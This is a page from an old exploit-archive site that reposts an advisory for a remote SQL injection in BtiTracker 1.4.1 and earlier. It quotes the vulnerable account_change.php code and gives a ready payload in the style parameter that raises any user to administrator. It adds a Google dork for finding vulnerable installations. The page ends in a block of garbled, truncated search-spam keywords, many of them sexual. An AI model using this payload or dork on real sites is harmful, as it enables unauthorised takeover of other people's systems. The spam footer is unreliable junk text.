about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability




2007-05-22 BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability
Rated as : High Risk

#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - babbano@gmail.com					
# Vulnerabitity: Remote Sql Injection /	                                  
     
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE
id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE
id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control:
account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################
securitydot.net - 2007-05-22

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:49:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.shwxds web ftp Www.fuckth mamta sax. tamil wome WWW sexy w karala Naked pics www. sexg Naked pics cms is fre 2.6.10- Namitha.ho Photo of n sexsevidie SCX www xxx89 t186t t186t 200 /compo xxxvedios www.89.c0m pamelasexy Searching www.sexind WWW.SEX6.C v i d e o www.desiba 89 com sex pis t325t xxx575xx in iceland t186t animal sex www.21zhuc Ww sxs . WWW.Sex18. gals4free. news for c gals4free. pamelasexy www.tamil t217t shilpa set xvideos.co Securitydo Ww sxs . t217t www.tamil